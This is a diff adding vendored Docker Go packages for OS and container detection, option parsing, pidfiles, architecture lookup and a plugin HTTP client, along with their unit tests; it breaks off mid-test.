--- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go @@ -0,0 +1,247 @@ +// +build linux freebsd + +package operatingsystem + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +func TestGetOperatingSystem(t *testing.T) { + var backup = etcOsRelease + + invalids := []struct { + content string + errorExpected string + }{ + { + `PRETTY_NAME=Source Mage GNU/Linux +PRETTY_NAME=Ubuntu 14.04.LTS`, + "PRETTY_NAME needs to be enclosed by quotes if they have spaces: Source Mage GNU/Linux", + }, + { + `PRETTY_NAME="Ubuntu Linux +PRETTY_NAME=Ubuntu 14.04.LTS`, + "PRETTY_NAME is invalid: invalid command line string", + }, + { + `PRETTY_NAME=Ubuntu' +PRETTY_NAME=Ubuntu 14.04.LTS`, + "PRETTY_NAME is invalid: invalid command line string", + }, + { + `PRETTY_NAME' +PRETTY_NAME=Ubuntu 14.04.LTS`, + "PRETTY_NAME needs to be enclosed by quotes if they have spaces: Ubuntu 14.04.LTS", + }, + } + + valids := []struct { + content string + expected string + }{ + { + `NAME="Ubuntu" +PRETTY_NAME_AGAIN="Ubuntu 14.04.LTS" +VERSION="14.04, Trusty Tahr" +ID=ubuntu +ID_LIKE=debian +VERSION_ID="14.04" +HOME_URL="http://www.ubuntu.com/" +SUPPORT_URL="http://help.ubuntu.com/" +BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"`, + "Linux", + }, + { + `NAME="Ubuntu" +VERSION="14.04, Trusty Tahr" +ID=ubuntu +ID_LIKE=debian +VERSION_ID="14.04" +HOME_URL="http://www.ubuntu.com/" +SUPPORT_URL="http://help.ubuntu.com/" +BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"`, + "Linux", + }, + { + `NAME=Gentoo +ID=gentoo +PRETTY_NAME="Gentoo/Linux" +ANSI_COLOR="1;32" +HOME_URL="http://www.gentoo.org/" +SUPPORT_URL="http://www.gentoo.org/main/en/support.xml" +BUG_REPORT_URL="https://bugs.gentoo.org/" +`, + "Gentoo/Linux", + }, + { + `NAME="Ubuntu" +VERSION="14.04, Trusty Tahr" +ID=ubuntu +ID_LIKE=debian +PRETTY_NAME="Ubuntu 14.04 LTS" +VERSION_ID="14.04" +HOME_URL="http://www.ubuntu.com/" +SUPPORT_URL="http://help.ubuntu.com/" +BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"`, + "Ubuntu 14.04 LTS", + }, + { + `NAME="Ubuntu" +VERSION="14.04, Trusty Tahr" +ID=ubuntu +ID_LIKE=debian +PRETTY_NAME='Ubuntu 14.04 LTS'`, + "Ubuntu 14.04 LTS", + }, + { + `PRETTY_NAME=Source +NAME="Source Mage"`, + "Source", + }, + { + `PRETTY_NAME=Source +PRETTY_NAME="Source Mage"`, + "Source Mage", + }, + } + + dir := os.TempDir() + etcOsRelease = filepath.Join(dir, "etcOsRelease") + + defer func() { + os.Remove(etcOsRelease) + etcOsRelease = backup + }() + + for _, elt := range invalids { + if err := ioutil.WriteFile(etcOsRelease, []byte(elt.content), 0600); err != nil { + t.Fatalf("failed to write to %s: %v", etcOsRelease, err) + } + s, err := GetOperatingSystem() + if err == nil || err.Error() != elt.errorExpected { + t.Fatalf("Expected an error %q, got %q (err: %v)", elt.errorExpected, s, err) + } + } + + for _, elt := range valids { + if err := ioutil.WriteFile(etcOsRelease, []byte(elt.content), 0600); err != nil { + t.Fatalf("failed to write to %s: %v", etcOsRelease, err) + } + s, err := GetOperatingSystem() + if err != nil || s != elt.expected { + t.Fatalf("Expected %q, got %q (err: %v)", elt.expected, s, err) + } + } +} + +func TestIsContainerized(t *testing.T) { + var ( + backup = proc1Cgroup + nonContainerizedProc1Cgroupsystemd226 = []byte(`9:memory:/init.scope +8:net_cls,net_prio:/ +7:cpuset:/ +6:freezer:/ +5:devices:/init.scope +4:blkio:/init.scope +3:cpu,cpuacct:/init.scope +2:perf_event:/ +1:name=systemd:/init.scope +`) + nonContainerizedProc1Cgroup = []byte(`14:name=systemd:/ +13:hugetlb:/ +12:net_prio:/ +11:perf_event:/ +10:bfqio:/ +9:blkio:/ +8:net_cls:/ +7:freezer:/ +6:devices:/ +5:memory:/ +4:cpuacct:/ +3:cpu:/ +2:cpuset:/ +`) + containerizedProc1Cgroup = []byte(`9:perf_event:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d +8:blkio:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d +7:net_cls:/ +6:freezer:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d +5:devices:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d +4:memory:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d +3:cpuacct:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d +2:cpu:/docker/3cef1b53c50b0fa357d994f8a1a8cd783c76bbf4f5dd08b226e38a8bd331338d +1:cpuset:/`) + ) + + dir := os.TempDir() + proc1Cgroup = filepath.Join(dir, "proc1Cgroup") + + defer func() { + os.Remove(proc1Cgroup) + proc1Cgroup = backup + }() + + if err := ioutil.WriteFile(proc1Cgroup, nonContainerizedProc1Cgroup, 0600); err != nil { + t.Fatalf("failed to write to %s: %v", proc1Cgroup, err) + } + inContainer, err := IsContainerized() + if err != nil { + t.Fatal(err) + } + if inContainer { + t.Fatal("Wrongly assuming containerized") + } + + if err := ioutil.WriteFile(proc1Cgroup, nonContainerizedProc1Cgroupsystemd226, 0600); err != nil { + t.Fatalf("failed to write to %s: %v", proc1Cgroup, err) + } + inContainer, err = IsContainerized() + if err != nil { + t.Fatal(err) + } + if inContainer { + t.Fatal("Wrongly assuming containerized for systemd /init.scope cgroup layout") + } + + if err := ioutil.WriteFile(proc1Cgroup, containerizedProc1Cgroup, 0600); err != nil { + t.Fatalf("failed to write to %s: %v", proc1Cgroup, err) + } + inContainer, err = IsContainerized() + if err != nil { + t.Fatal(err) + } + if !inContainer { + t.Fatal("Wrongly assuming non-containerized") + } +} + +func TestOsReleaseFallback(t *testing.T) { + var backup = etcOsRelease + var altBackup = altOsRelease + dir := os.TempDir() + etcOsRelease = filepath.Join(dir, "etcOsRelease") + altOsRelease = filepath.Join(dir, "altOsRelease") + + defer func() { + os.Remove(dir) + etcOsRelease = backup + altOsRelease = altBackup + }() + content := `NAME=Gentoo +ID=gentoo +PRETTY_NAME="Gentoo/Linux" +ANSI_COLOR="1;32" +HOME_URL="http://www.gentoo.org/" +SUPPORT_URL="http://www.gentoo.org/main/en/support.xml" +BUG_REPORT_URL="https://bugs.gentoo.org/" +` + if err := ioutil.WriteFile(altOsRelease, []byte(content), 0600); err != nil { + t.Fatalf("failed to write to %s: %v", etcOsRelease, err) + } + s, err := GetOperatingSystem() + if err != nil || s != "Gentoo/Linux" { + t.Fatalf("Expected %q, got %q (err: %v)", "Gentoo/Linux", s, err) + } +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go new file mode 100644 index 0000000000..3c86b6af9c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go @@ -0,0 +1,49 @@ +package operatingsystem + +import ( + "syscall" + "unsafe" +) + +// See https://code.google.com/p/go/source/browse/src/pkg/mime/type_windows.go?r=d14520ac25bf6940785aabb71f5be453a286f58c +// for a similar sample + +// GetOperatingSystem gets the name of the current operating system. +func GetOperatingSystem() (string, error) { + + var h syscall.Handle + + // Default return value + ret := "Unknown Operating System" + + if err := syscall.RegOpenKeyEx(syscall.HKEY_LOCAL_MACHINE, + syscall.StringToUTF16Ptr(`SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\`), + 0, + syscall.KEY_READ, + &h); err != nil { + return ret, err + } + defer syscall.RegCloseKey(h) + + var buf [1 << 10]uint16 + var typ uint32 + n := uint32(len(buf) * 2) // api expects array of bytes, not uint16 + + if err := syscall.RegQueryValueEx(h, + syscall.StringToUTF16Ptr("ProductName"), + nil, + &typ, + (*byte)(unsafe.Pointer(&buf[0])), + &n); err != nil { + return ret, err + } + ret = syscall.UTF16ToString(buf[:]) + + return ret, nil +} + +// IsContainerized returns true if we are running inside a container. +// No-op on Windows, always returns false. +func IsContainerized() (bool, error) { + return false, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/parsers.go b/vendor/github.com/docker/docker/pkg/parsers/parsers.go new file mode 100644 index 0000000000..acc897168f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/parsers.go @@ -0,0 +1,69 @@ +// Package parsers provides helper functions to parse and validate different type +// of string. It can be hosts, unix addresses, tcp addresses, filters, kernel +// operating system versions. +package parsers + +import ( + "fmt" + "strconv" + "strings" +) + +// ParseKeyValueOpt parses and validates the specified string as a key/value pair (key=value) +func ParseKeyValueOpt(opt string) (string, string, error) { + parts := strings.SplitN(opt, "=", 2) + if len(parts) != 2 { + return "", "", fmt.Errorf("Unable to parse key/value option: %s", opt) + } + return strings.TrimSpace(parts[0]), strings.TrimSpace(parts[1]), nil +} + +// ParseUintList parses and validates the specified string as the value +// found in some cgroup file (e.g. `cpuset.cpus`, `cpuset.mems`), which could be +// one of the formats below. Note that duplicates are actually allowed in the +// input string. It returns a `map[int]bool` with available elements from `val` +// set to `true`. +// Supported formats: +// 7 +// 1-6 +// 0,3-4,7,8-10 +// 0-0,0,1-7 +// 03,1-3 <- this is gonna get parsed as [1,2,3] +// 3,2,1 +// 0-2,3,1 +func ParseUintList(val string) (map[int]bool, error) { + if val == "" { + return map[int]bool{}, nil + } + + availableInts := make(map[int]bool) + split := strings.Split(val, ",") + errInvalidFormat := fmt.Errorf("invalid format: %s", val) + + for _, r := range split { + if !strings.Contains(r, "-") { + v, err := strconv.Atoi(r) + if err != nil { + return nil, errInvalidFormat + } + availableInts[v] = true + } else { + split := strings.SplitN(r, "-", 2) + min, err := strconv.Atoi(split[0]) + if err != nil { + return nil, errInvalidFormat + } + max, err := strconv.Atoi(split[1]) + if err != nil { + return nil, errInvalidFormat + } + if max < min { + return nil, errInvalidFormat + } + for i := min; i <= max; i++ { + availableInts[i] = true + } + } + } + return availableInts, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go b/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go new file mode 100644 index 0000000000..7f19e90279 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go @@ -0,0 +1,70 @@ +package parsers + +import ( + "reflect" + "testing" +) + +func TestParseKeyValueOpt(t *testing.T) { + invalids := map[string]string{ + "": "Unable to parse key/value option: ", + "key": "Unable to parse key/value option: key", + } + for invalid, expectedError := range invalids { + if _, _, err := ParseKeyValueOpt(invalid); err == nil || err.Error() != expectedError { + t.Fatalf("Expected error %v for %v, got %v", expectedError, invalid, err) + } + } + valids := map[string][]string{ + "key=value": {"key", "value"}, + " key = value ": {"key", "value"}, + "key=value1=value2": {"key", "value1=value2"}, + " key = value1 = value2 ": {"key", "value1 = value2"}, + } + for valid, expectedKeyValue := range valids { + key, value, err := ParseKeyValueOpt(valid) + if err != nil { + t.Fatal(err) + } + if key != expectedKeyValue[0] || value != expectedKeyValue[1] { + t.Fatalf("Expected {%v: %v} got {%v: %v}", expectedKeyValue[0], expectedKeyValue[1], key, value) + } + } +} + +func TestParseUintList(t *testing.T) { + valids := map[string]map[int]bool{ + "": {}, + "7": {7: true}, + "1-6": {1: true, 2: true, 3: true, 4: true, 5: true, 6: true}, + "0-7": {0: true, 1: true, 2: true, 3: true, 4: true, 5: true, 6: true, 7: true}, + "0,3-4,7,8-10": {0: true, 3: true, 4: true, 7: true, 8: true, 9: true, 10: true}, + "0-0,0,1-4": {0: true, 1: true, 2: true, 3: true, 4: true}, + "03,1-3": {1: true, 2: true, 3: true}, + "3,2,1": {1: true, 2: true, 3: true}, + "0-2,3,1": {0: true, 1: true, 2: true, 3: true}, + } + for k, v := range valids { + out, err := ParseUintList(k) + if err != nil { + t.Fatalf("Expected not to fail, got %v", err) + } + if !reflect.DeepEqual(out, v) { + t.Fatalf("Expected %v, got %v", v, out) + } + } + + invalids := []string{ + "this", + "1--", + "1-10,,10", + "10-1", + "-1", + "-1,0", + } + for _, v := range invalids { + if out, err := ParseUintList(v); err == nil { + t.Fatalf("Expected failure with %s but got %v", v, out) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go new file mode 100644 index 0000000000..d832fea7a2 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go @@ -0,0 +1,56 @@ +// Package pidfile provides structure and helper functions to create and remove +// PID file. A PID file is usually a file used to store the process ID of a +// running process. +package pidfile + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "strconv" + "strings" + + "github.com/docker/docker/pkg/system" +) + +// PIDFile is a file used to store the process ID of a running process. +type PIDFile struct { + path string +} + +func checkPIDFileAlreadyExists(path string) error { + if pidByte, err := ioutil.ReadFile(path); err == nil { + pidString := strings.TrimSpace(string(pidByte)) + if pid, err := strconv.Atoi(pidString); err == nil { + if processExists(pid) { + return fmt.Errorf("pid file found, ensure docker is not running or delete %s", path) + } + } + } + return nil +} + +// New creates a PIDfile using the specified path. +func New(path string) (*PIDFile, error) { + if err := checkPIDFileAlreadyExists(path); err != nil { + return nil, err + } + // Note MkdirAll returns nil if a directory already exists + if err := system.MkdirAll(filepath.Dir(path), os.FileMode(0755)); err != nil { + return nil, err + } + if err := ioutil.WriteFile(path, []byte(fmt.Sprintf("%d", os.Getpid())), 0644); err != nil { + return nil, err + } + + return &PIDFile{path: path}, nil +} + +// Remove removes the PIDFile. +func (file PIDFile) Remove() error { + if err := os.Remove(file.path); err != nil { + return err + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go new file mode 100644 index 0000000000..5c1cd7ab85 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go @@ -0,0 +1,18 @@ +// +build darwin + +package pidfile + +import ( + "syscall" +) + +func processExists(pid int) bool { + // OS X does not have a proc filesystem. + // Use kill -0 pid to judge if the process exists. + err := syscall.Kill(pid, 0) + if err != nil { + return false + } + + return true +} diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go new file mode 100644 index 0000000000..73e8af76db --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go @@ -0,0 +1,38 @@ +package pidfile + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +func TestNewAndRemove(t *testing.T) { + dir, err := ioutil.TempDir(os.TempDir(), "test-pidfile") + if err != nil { + t.Fatal("Could not create test directory") + } + + path := filepath.Join(dir, "testfile") + file, err := New(path) + if err != nil { + t.Fatal("Could not create test file", err) + } + + _, err = New(path) + if err == nil { + t.Fatal("Test file creation not blocked") + } + + if err := file.Remove(); err != nil { + t.Fatal("Could not delete created test file") + } +} + +func TestRemoveInvalidPath(t *testing.T) { + file := PIDFile{path: filepath.Join("foo", "bar")} + + if err := file.Remove(); err == nil { + t.Fatal("Non-existing file doesn't give an error on delete") + } +} diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go new file mode 100644 index 0000000000..1bf5221e3b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go @@ -0,0 +1,16 @@ +// +build !windows,!darwin + +package pidfile + +import ( + "os" + "path/filepath" + "strconv" +) + +func processExists(pid int) bool { + if _, err := os.Stat(filepath.Join("/proc", strconv.Itoa(pid))); err == nil { + return true + } + return false +} diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go new file mode 100644 index 0000000000..ae489c627a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go @@ -0,0 +1,23 @@ +package pidfile + +import "syscall" + +const ( + processQueryLimitedInformation = 0x1000 + + stillActive = 259 +) + +func processExists(pid int) bool { + h, err := syscall.OpenProcess(processQueryLimitedInformation, false, uint32(pid)) + if err != nil { + return false + } + var c uint32 + err = syscall.GetExitCodeProcess(h, &c) + syscall.Close(h) + if err != nil { + return c == stillActive + } + return true +} diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go b/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go new file mode 100644 index 0000000000..2cdc2c5918 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go @@ -0,0 +1,16 @@ +// Package platform provides helper function to get the runtime architecture +// for different platforms. +package platform + +import ( + "syscall" +) + +// runtimeArchitecture gets the name of the current architecture (x86, x86_64, …) +func runtimeArchitecture() (string, error) { + utsname := &syscall.Utsname{} + if err := syscall.Uname(utsname); err != nil { + return "", err + } + return charsToString(utsname.Machine), nil +} diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go b/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go new file mode 100644 index 0000000000..45bbcf1535 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go @@ -0,0 +1,20 @@ +// +build freebsd solaris darwin + +// Package platform provides helper function to get the runtime architecture +// for different platforms. +package platform + +import ( + "os/exec" + "strings" +) + +// runtimeArchitecture gets the name of the current architecture (x86, x86_64, i86pc, sun4v, ...) +func runtimeArchitecture() (string, error) { + cmd := exec.Command("/usr/bin/uname", "-m") + machine, err := cmd.Output() + if err != nil { + return "", err + } + return strings.TrimSpace(string(machine)), nil +} diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go b/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go new file mode 100644 index 0000000000..c5f684ddfa --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go @@ -0,0 +1,60 @@ +package platform + +import ( + "fmt" + "syscall" + "unsafe" + + "golang.org/x/sys/windows" +) + +var ( + modkernel32 = windows.NewLazySystemDLL("kernel32.dll") + procGetSystemInfo = modkernel32.NewProc("GetSystemInfo") +) + +// see http://msdn.microsoft.com/en-us/library/windows/desktop/ms724958(v=vs.85).aspx +type systeminfo struct { + wProcessorArchitecture uint16 + wReserved uint16 + dwPageSize uint32 + lpMinimumApplicationAddress uintptr + lpMaximumApplicationAddress uintptr + dwActiveProcessorMask uintptr + dwNumberOfProcessors uint32 + dwProcessorType uint32 + dwAllocationGranularity uint32 + wProcessorLevel uint16 + wProcessorRevision uint16 +} + +// Constants +const ( + ProcessorArchitecture64 = 9 // PROCESSOR_ARCHITECTURE_AMD64 + ProcessorArchitectureIA64 = 6 // PROCESSOR_ARCHITECTURE_IA64 + ProcessorArchitecture32 = 0 // PROCESSOR_ARCHITECTURE_INTEL + ProcessorArchitectureArm = 5 // PROCESSOR_ARCHITECTURE_ARM +) + +// runtimeArchitecture gets the name of the current architecture (x86, x86_64, …) +func runtimeArchitecture() (string, error) { + var sysinfo systeminfo + syscall.Syscall(procGetSystemInfo.Addr(), 1, uintptr(unsafe.Pointer(&sysinfo)), 0, 0) + switch sysinfo.wProcessorArchitecture { + case ProcessorArchitecture64, ProcessorArchitectureIA64: + return "x86_64", nil + case ProcessorArchitecture32: + return "i686", nil + case ProcessorArchitectureArm: + return "arm", nil + default: + return "", fmt.Errorf("Unknown processor architecture") + } +} + +// NumProcs returns the number of processors on the system +func NumProcs() uint32 { + var sysinfo systeminfo + syscall.Syscall(procGetSystemInfo.Addr(), 1, uintptr(unsafe.Pointer(&sysinfo)), 0, 0) + return sysinfo.dwNumberOfProcessors +} diff --git a/vendor/github.com/docker/docker/pkg/platform/platform.go b/vendor/github.com/docker/docker/pkg/platform/platform.go new file mode 100644 index 0000000000..e4b03122f4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/platform/platform.go @@ -0,0 +1,23 @@ +package platform + +import ( + "runtime" + + "github.com/Sirupsen/logrus" +) + +var ( + // Architecture holds the runtime architecture of the process. + Architecture string + // OSType holds the runtime operating system type (Linux, …) of the process. + OSType string +) + +func init() { + var err error + Architecture, err = runtimeArchitecture() + if err != nil { + logrus.Errorf("Could not read system architecture info: %v", err) + } + OSType = runtime.GOOS +} diff --git a/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go b/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go new file mode 100644 index 0000000000..5dcbadfdfe --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go @@ -0,0 +1,18 @@ +// +build linux,386 linux,amd64 linux,arm64 +// see golang's sources src/syscall/ztypes_linux_*.go that use int8 + +package platform + +// Convert the OS/ARCH-specific utsname.Machine to string +// given as an array of signed int8 +func charsToString(ca [65]int8) string { + s := make([]byte, len(ca)) + var lens int + for ; lens < len(ca); lens++ { + if ca[lens] == 0 { + break + } + s[lens] = uint8(ca[lens]) + } + return string(s[0:lens]) +} diff --git a/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go b/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go new file mode 100644 index 0000000000..c9875cf6e6 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go @@ -0,0 +1,18 @@ +// +build linux,arm linux,ppc64 linux,ppc64le s390x +// see golang's sources src/syscall/ztypes_linux_*.go that use uint8 + +package platform + +// Convert the OS/ARCH-specific utsname.Machine to string +// given as an array of unsigned uint8 +func charsToString(ca [65]uint8) string { + s := make([]byte, len(ca)) + var lens int + for ; lens < len(ca); lens++ { + if ca[lens] == 0 { + break + } + s[lens] = ca[lens] + } + return string(s[0:lens]) +} diff --git a/vendor/github.com/docker/docker/pkg/plugingetter/getter.go b/vendor/github.com/docker/docker/pkg/plugingetter/getter.go new file mode 100644 index 0000000000..dde5f66035 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugingetter/getter.go @@ -0,0 +1,35 @@ +package plugingetter + +import "github.com/docker/docker/pkg/plugins" + +const ( + // LOOKUP doesn't update RefCount + LOOKUP = 0 + // ACQUIRE increments RefCount + ACQUIRE = 1 + // RELEASE decrements RefCount + RELEASE = -1 +) + +// CompatPlugin is a abstraction to handle both v2(new) and v1(legacy) plugins. +type CompatPlugin interface { + Client() *plugins.Client + Name() string + BasePath() string + IsV1() bool +} + +// CountedPlugin is a plugin which is reference counted. +type CountedPlugin interface { + Acquire() + Release() + CompatPlugin +} + +// PluginGetter is the interface implemented by Store +type PluginGetter interface { + Get(name, capability string, mode int) (CompatPlugin, error) + GetAllByCap(capability string) ([]CompatPlugin, error) + GetAllManagedPluginsByCap(capability string) []CompatPlugin + Handle(capability string, callback func(string, *plugins.Client)) +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/client.go b/vendor/github.com/docker/docker/pkg/plugins/client.go new file mode 100644 index 0000000000..e8e730eb58 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/client.go @@ -0,0 +1,205 @@ +package plugins + +import ( + "bytes" + "encoding/json" + "io" + "io/ioutil" + "net/http" + "net/url" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/plugins/transport" + "github.com/docker/go-connections/sockets" + "github.com/docker/go-connections/tlsconfig" +) + +const ( + defaultTimeOut = 30 +) + +func newTransport(addr string, tlsConfig *tlsconfig.Options) (transport.Transport, error) { + tr := &http.Transport{} + + if tlsConfig != nil { + c, err := tlsconfig.Client(*tlsConfig) + if err != nil { + return nil, err + } + tr.TLSClientConfig = c + } + + u, err := url.Parse(addr) + if err != nil { + return nil, err + } + socket := u.Host + if socket == "" { + // valid local socket addresses have the host empty. + socket = u.Path + } + if err := sockets.ConfigureTransport(tr, u.Scheme, socket); err != nil { + return nil, err + } + scheme := httpScheme(u) + + return transport.NewHTTPTransport(tr, scheme, socket), nil +} + +// NewClient creates a new plugin client (http). +func NewClient(addr string, tlsConfig *tlsconfig.Options) (*Client, error) { + clientTransport, err := newTransport(addr, tlsConfig) + if err != nil { + return nil, err + } + return newClientWithTransport(clientTransport, 0), nil +} + +// NewClientWithTimeout creates a new plugin client (http). +func NewClientWithTimeout(addr string, tlsConfig *tlsconfig.Options, timeoutInSecs int) (*Client, error) { + clientTransport, err := newTransport(addr, tlsConfig) + if err != nil { + return nil, err + } + return newClientWithTransport(clientTransport, timeoutInSecs), nil +} + +// newClientWithTransport creates a new plugin client with a given transport. +func newClientWithTransport(tr transport.Transport, timeoutInSecs int) *Client { + return &Client{ + http: &http.Client{ + Transport: tr, + Timeout: time.Duration(timeoutInSecs) * time.Second, + }, + requestFactory: tr, + } +} + +// Client represents a plugin client. +type Client struct { + http *http.Client // http client to use + requestFactory transport.RequestFactory +} + +// Call calls the specified method with the specified arguments for the plugin. +// It will retry for 30 seconds if a failure occurs when calling. +func (c *Client) Call(serviceMethod string, args interface{}, ret interface{}) error { + var buf bytes.Buffer + if args != nil { + if err := json.NewEncoder(&buf).Encode(args); err != nil { + return err + } + } + body, err := c.callWithRetry(serviceMethod, &buf, true) + if err != nil { + return err + } + defer body.Close() + if ret != nil { + if err := json.NewDecoder(body).Decode(&ret); err != nil { + logrus.Errorf("%s: error reading plugin resp: %v", serviceMethod, err) + return err + } + } + return nil +} + +// Stream calls the specified method with the specified arguments for the plugin and returns the response body +func (c *Client) Stream(serviceMethod string, args interface{}) (io.ReadCloser, error) { + var buf bytes.Buffer + if err := json.NewEncoder(&buf).Encode(args); err != nil { + return nil, err + } + return c.callWithRetry(serviceMethod, &buf, true) +} + +// SendFile calls the specified method, and passes through the IO stream +func (c *Client) SendFile(serviceMethod string, data io.Reader, ret interface{}) error { + body, err := c.callWithRetry(serviceMethod, data, true) + if err != nil { + return err + } + defer body.Close() + if err := json.NewDecoder(body).Decode(&ret); err != nil { + logrus.Errorf("%s: error reading plugin resp: %v", serviceMethod, err) + return err + } + return nil +} + +func (c *Client) callWithRetry(serviceMethod string, data io.Reader, retry bool) (io.ReadCloser, error) { + req, err := c.requestFactory.NewRequest(serviceMethod, data) + if err != nil { + return nil, err + } + + var retries int + start := time.Now() + + for { + resp, err := c.http.Do(req) + if err != nil { + if !retry { + return nil, err + } + + timeOff := backoff(retries) + if abort(start, timeOff) { + return nil, err + } + retries++ + logrus.Warnf("Unable to connect to plugin: %s%s: %v, retrying in %v", req.URL.Host, req.URL.Path, err, timeOff) + time.Sleep(timeOff) + continue + } + + if resp.StatusCode != http.StatusOK { + b, err := ioutil.ReadAll(resp.Body) + resp.Body.Close() + if err != nil { + return nil, &statusError{resp.StatusCode, serviceMethod, err.Error()} + } + + // Plugins' Response(s) should have an Err field indicating what went + // wrong. Try to unmarshal into ResponseErr. Otherwise fallback to just + // return the string(body) + type responseErr struct { + Err string + } + remoteErr := responseErr{} + if err := json.Unmarshal(b, &remoteErr); err == nil { + if remoteErr.Err != "" { + return nil, &statusError{resp.StatusCode, serviceMethod, remoteErr.Err} + } + } + // old way... + return nil, &statusError{resp.StatusCode, serviceMethod, string(b)} + } + return resp.Body, nil + } +} + +func backoff(retries int) time.Duration { + b, max := 1, defaultTimeOut + for b < max && retries > 0 { + b *= 2 + retries-- + } + if b > max { + b = max + } + return time.Duration(b) * time.Second +} + +func abort(start time.Time, timeOff time.Duration) bool { + return timeOff+time.Since(start) >= time.Duration(defaultTimeOut)*time.Second +} + +func httpScheme(u *url.URL) string { + scheme := u.Scheme + if scheme != "https" { + scheme = "http" + } + return scheme +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/client_test.go b/vendor/github.com/docker/docker/pkg/plugins/client_test.go new file mode 100644 index 0000000000..9faad86a15 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/client_test.go @@ -0,0 +1,134 @@ +package plugins + +import ( + "io" + "net/http" + "net/http/httptest" + "net/url" + "reflect" + "testing" + "time" + + "github.com/docker/docker/pkg/plugins/transport" + "github.com/docker/go-connections/tlsconfig" +) + +var ( + mux *http.ServeMux + server *httptest.Server +) + +func setupRemotePluginServer() string { + mux = http.NewServeMux() + server = httptest.NewServer(mux) + return server.URL +} + +func teardownRemotePluginServer() { + if server != nil { + server.Close() + } +} + +func TestFailedConnection(t *testing.T) { + c, _ := NewClient("tcp://127.0.0.1:1", &tlsconfig.Options{InsecureSkipVerify: true}) + _, err := c.callWithRetry("Service.Method", nil, false) + if err == nil { + t.Fatal("Unexpected successful connection") + } +} + +func TestEchoInputOutput(t *testing.T) { + addr := setupRemotePluginServer() + defer teardownRemotePluginServer() + + m := Manifest{[]string{"VolumeDriver", "NetworkDriver"}} + + mux.HandleFunc("/Test.Echo", func(w http.ResponseWriter, r *http.Request) { + if r.Method != "POST" { + t.Fatalf("Expected POST, got %s\n", r.Method) + } + + header := w.Header() + header.Set("Content-Type", transport.VersionMimetype) + + io.Copy(w, r.Body) + }) + + c, _ := NewClient(addr, &tlsconfig.Options{InsecureSkipVerify: true}) + var output Manifest + err := c.Call("Test.Echo", m, &output) + if err != nil { + t.Fatal(err) + } + + if !reflect.DeepEqual(output, m) { + t.Fatalf("Expected %v, was %v\n", m, output) + } + err = c.Call("Test.Echo", nil, nil) + if err != nil { + t.Fatal(err) + } +} + +func TestBackoff(t *testing.T) { + cases := []struct { + retries int + expTimeOff time.Duration + }{ + {0, time.Duration(1)}, + {1, time.Duration(2)}, + {2, time.Duration(4)}, + {4, 